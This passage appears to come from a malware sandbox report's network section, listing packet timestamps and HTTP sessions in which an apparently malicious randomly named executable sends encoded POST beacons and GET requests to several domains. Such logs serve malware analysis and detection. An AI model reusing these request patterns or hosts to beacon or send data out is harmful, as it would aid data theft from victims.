                                                                                                      Oct 22, 2024 09:07:11.984030962 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:12.035173893 CEST805004538.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:12.035412073 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:12.803602934 CEST5004580192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.857940912 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.863349915 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.864104986 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.905544043 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:13.911506891 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912678957 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912684917 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912791014 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912795067 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912805080 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912808895 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912818909 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:13.912826061 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.565916061 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.565956116 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.566018105 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:14.617461920 CEST805004638.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:14.617522955 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:15.413045883 CEST5004680192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.432642937 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.438980103 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:16.441745996 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.453634024 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:16.458905935 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153773069 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153790951 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.153960943 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.204807043 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:17.205132008 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.206063986 CEST5004780192.168.2.438.88.82.56
                                                                                                      Oct 22, 2024 09:07:17.211421013 CEST805004738.88.82.56192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.255224943 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.260644913 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.260865927 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.270895958 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:22.276324034 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.881470919 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:22.881536007 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:23.777642012 CEST5004880192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:23.783373117 CEST80500483.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:24.791522026 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.796907902 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:24.796976089 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.809139967 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:24.814526081 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:25.433888912 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:25.434010029 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:26.319148064 CEST5004980192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:26.328629017 CEST80500493.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.338113070 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.343646049 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.343734980 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.354556084 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:27.360085964 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360097885 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360106945 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360151052 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360160112 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360168934 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360187054 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360196114 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.360234976 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.988684893 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:27.988871098 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:28.866152048 CEST5005080192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:28.871504068 CEST80500503.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:29.884254932 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.889977932 CEST80500513.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:07:29.892168045 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.898114920 CEST5005180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:07:29.903454065 CEST80500513.33.130.190192.168.2.4
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:04:43.096508980 CEST | 452 | OUT | GET /up8i/?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.ladylawher.org
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:04:43.729077101 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 22 Oct 2024 07:04:43 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
                                                                                                      Connection: close
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qp=qTZ8t28&_XPD90E=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 141.193.213.10 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:04:59.025485992 CEST | 736 | OUT | POST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=o9/euJtDoA2P38xaVXpTM2CwkYLhrXvoUOEzqeBL4N6Oh6gLekwqaFKAfYgp68Gru9dsczyXOU65pljUivgKMo4sQo9/M926ZsBq2JxgePCnIKCqcDN5kpNmjK70cHLFc2aer/HC1MJuaBRQ74Xp9UEOh7NY7N6Wb0fsuvHrjRF6W1PwdsN8PY78QCFcIss+pQ==
Oct 22, 2024 09:04:59.705552101 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:04:59 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a2ec2ce44761-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49745 | 141.193.213.10 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:01.581177950 CEST | 756 | OUT | POST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=o9/euJtDoA2P3cBaO0BTNWCzu4Lhh3v0UO4zqaZh44qOhesLfgkqZFKAHIhCkMGeu9RecyOXOVa5pm3UjfcLO44yZI99Tt26ZsBq2IVKePanL6yqdhl2npNl3a70XnLZc2a8r+bk1KFuaDZQ6sDu0UEI/LMcwdjSBBnhodb3oRRqaTCqMdsrdYfPNFMoFvR3yZ8Qevlpu8gq0PjpPVv8TSM=
Oct 22, 2024 09:05:02.264273882 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:02 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a2fc3899b793-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49756 | 141.193.213.10 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:04.117714882 CEST | 10838 | OUT | POST /9g6s/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      Origin: http://www.meanttobebroken.org
                                                                                                      Referer: http://www.meanttobebroken.org/9g6s/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:05:04.799812078 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 22 Oct 2024 07:05:04 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a30bfb3a47a2-DFW
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49771 | 141.193.213.10 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:06.661153078 CEST | 457 | OUT | GET /9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.meanttobebroken.org
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:05:07.343538046 CEST | 648 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 22 Oct 2024 07:05:07 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-powered-by: WP Engine
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      X-Redirect-By: WordPress
                                                                                                      Location: http://meanttobebroken.org/9g6s/?_XPD90E=l/X+t9hb8CWGjOR6SGZVUSer8Zv3g1fAQ4EIxPlc4MjqsNc2fQ5FEV3oB4t5s/ThvfRNUBaEClSQ3k3rscZvXswkeLIgZt7sZdEg/e0UbdbzANigZVdYlcc=&qp=qTZ8t28
                                                                                                      X-Cacheable: non200
                                                                                                      Cache-Control: max-age=600, must-revalidate
                                                                                                      X-Cache: MISS
                                                                                                      X-Cache-Group: normal
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d67a31bf8c86c80-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49803 | 8.210.3.99 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:12.389537096 CEST | 709 | OUT | POST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:05:13.362375021 CEST | 417 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:13 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49819 | 8.210.3.99 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:14.937289953 CEST | 729 | OUT | POST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:05:15.909924984 CEST | 417 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:15 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49833 | 8.210.3.99 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 09:05:17.479896069 CEST | 10811 | OUT | POST /li8d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      Origin: http://www.jexiz.shop
                                                                                                      Referer: http://www.jexiz.shop/li8d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 22, 2024 09:05:18.448095083 CEST | 417 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:18 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 226
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/'"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      8 | 192.168.2.4 | 49846 | 8.210.3.99 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:20.047442913 CEST | 448 | OUT | GET /li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU= HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.jexiz.shop
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:21.006030083 CEST | 701 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://www.jexiz.shop/li8d/?qp=qTZ8t28&_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU=
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Date: Tue, 22 Oct 2024 07:05:20 GMT
                                                                                                      Connection: close
                                                                                                      Content-Length: 370
                                                                                                      Data Ascii: <html><head><META http-equiv="refresh" content="0;URL='https://www.jexiz.shop/li8d/?qp=qTZ8t28&amp;_XPD90E=sm+xvlFNJ8Jn1MAgd7H5GM7xL3QFLG7nhYuDtN4QDuuoOIQ72IBR7vtXSrP0imT8uQD+i024Jy05gJvrsmbr4aM8dbnuEYYtVmB+eJtacLqhBkyb5k3hgGU='"></head><body>... Hello Developer Person! We don't serve insecure resources around here. Please use HTTPS instead. --></body></html>


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      9 | 192.168.2.4 | 49882 | 162.0.215.244 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:26.388324022 CEST | 733 | OUT | POST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=y499qLhHiVJodVbJJHsYm82h4UAQmOyF3w/3prDyIWQ3/pzTP8XZh5h813Zw1QG9Rfs6quD/tq3jSIAEoqOBHXZLbX4OsbZruXbPfzbVG2EhQC+nOpjrSPkGoY9iliaHBB9o55UtpJcXkPfPHNgPcgbG3OPs8pFPPsqClhOR49tfitVvvePu/hjNfAtumaeTRA==
                                                                                                      Oct 22, 2024 09:05:27.248363018 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:26 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      10 | 192.168.2.4 | 49898 | 162.0.215.244 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Oct 22, 2024 09:05:28.934535027 CEST | 753 | OUT | POST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 224
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Ascii: _XPD90E=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgI3mIjTdJrZg5h86XZx6wGqRfoyquP/tqLjSN8EoZmGWXZFS34AobZruXbPfy/vGyQhXzOnPNXobvkBvY9ihibvBB8N59UHpLUXkOvPHcgMVgbE6uOA4oUKKpjXqHilzddVqLY1+vu5thH+CHkarZjaKCB+bdXC8qmYHgaAPAc7Lwg=
                                                                                                      Oct 22, 2024 09:05:29.601711988 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:28 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      11 | 192.168.2.4 | 49909 | 162.0.215.244 | 80 | 5796 | C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
